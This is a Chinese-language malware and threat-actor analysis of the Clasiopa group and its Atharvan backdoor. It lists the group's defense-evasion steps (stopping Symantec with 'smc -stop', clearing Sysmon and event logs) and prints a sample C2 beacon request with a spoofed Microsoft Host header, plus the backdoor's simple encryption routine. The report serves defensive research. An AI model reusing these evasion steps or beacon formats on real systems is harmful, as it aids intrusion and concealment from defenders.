研究人員發(fā)現(xiàn)一個(gè)未知的攻擊組織以亞洲一家材料行業(yè)的公司為攻擊目標(biāo)，被命名為 Clasiopa。該組織使用獨(dú)特的攻擊工具，開發(fā)了定制化的后門 Atharvan。

Clasiopa 的 TTP

尚不清楚 Clasiopa 的攻擊媒介是什么，研究人員猜測(cè)是通過對(duì)外開放的服務(wù)進(jìn)行暴力破解獲取的訪問權(quán)限。

攻擊中還有許多特征：

• 利用 ifconfig.me/ip 獲取失陷主機(jī)的 IP 地址
• 試圖通過停止 SepMasterService 來停用 Symantec Endpoint Protection，再利用 smc -stop 徹底禁用安全防護(hù)軟件
• 使用多個(gè)后門來外傳文件名列表，列表存儲(chǔ)在 Thumb.db 文件或 ZIP 壓縮文件中
• 使用 wsmprovhost 清除 Sysmon 日志
• 使用 PowerShell 清除所有事件日志
• 創(chuàng)建計(jì)劃任務(wù)獲取文件名

在一臺(tái)失陷主機(jī)上發(fā)現(xiàn)了運(yùn)行的 Agile DGS 和 Agile FD 服務(wù)，惡意樣本被放置在名為 dgs 的文件夾中。與此同時(shí)，一個(gè)后門被從 atharvan.exe 重命名為 agile_update.exe。另一臺(tái)失陷主機(jī)上運(yùn)行著 HCL Domino 服務(wù)，但并不清楚這是否是巧合。但這些服務(wù)都在使用舊證書，還包含部分存在漏洞的庫(kù)。

攻擊工具

攻擊者使用了自研的遠(yuǎn)控木馬 Atharvan，以及開源遠(yuǎn)控木馬 Lilith 的定制版本。此外，攻擊者還使用了 Thumbsender 與自定義代理工具。

Atharvan

Atharvan 樣本文件在運(yùn)行時(shí)會(huì)創(chuàng)建名為 SAPTARISHI-ATHARVAN-101的互斥量，因此得名。

C&C 服務(wù)器硬編碼在樣本中，位于 AWS 的韓國(guó)區(qū)。POST 請(qǐng)求中，Host 被硬編碼為 update.microsoft.com。例如：

POST /update.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52
Host: update.microsoft.com
Content-type: application/x-www-form-urlencoded
Content-length: 46
id=Atharvan&code=101&cid=H^[REDACTED]&time=5?

請(qǐng)求參數(shù)如下：

• id：硬編碼為 Atharvan
• code：表示請(qǐng)求目的
• cid：硬編碼字符后為失陷主機(jī)的 MAC 地址
• time：通信時(shí)間間隔
• msg：根據(jù) code 參數(shù)不同表示請(qǐng)求目的

在加密 msg 時(shí)，惡意軟件使用以下加密算法：

def encrypt(plaintext):
return bytes([((2 - byte) & 0xff) for byte in plaintext])?

惡意軟件使用簡(jiǎn)單的 HTTP 解析工具在服務(wù)器響應(yīng)中提取信息，解密算法如下所示：

def decrypt(ciphertext):
return bytes([((2 - byte) & 0xff) for byte in ciphertext])?

獲取命令時(shí)，惡意軟件預(yù)期解密的正文由 \x1A 分隔的字符串組成。每個(gè)字符串的第一個(gè)字節(jié)用于指定要執(zhí)行的命令，其余字節(jié)為命令參數(shù)：

Atharvan 命令參數(shù)

配置計(jì)劃通信，命令參數(shù)指定時(shí)間與日期，編碼為：

• 無限制（0x16）
• 指定月中的天（0x17）
• 指定星期幾（0x18）

預(yù)制的通信模式是該惡意軟件的另一個(gè)不常見的特征。

歸因

目前沒有確切的證據(jù)表明 Clasiopa 的背景與動(dòng)機(jī)。盡管 Atharvan 在后門中使用了印地語(yǔ)作為互斥體的名字（SAPTARISHI-ATHARVAN-101），而且 Atharvan 也是印度教的神明。后門向 C&C 服務(wù)器發(fā)送的 POST 請(qǐng)求為 d=%s&code=%d&cid=%s&time=%dtharvan，攻擊者用于 ZIP 壓縮文件的密碼為 iloveindea1998^_^。盡管這些細(xì)節(jié)可能表明該組織位于印度，但這些信息也可能是作為虛假 Flag 植入其中，尤其是密碼似乎過于明顯。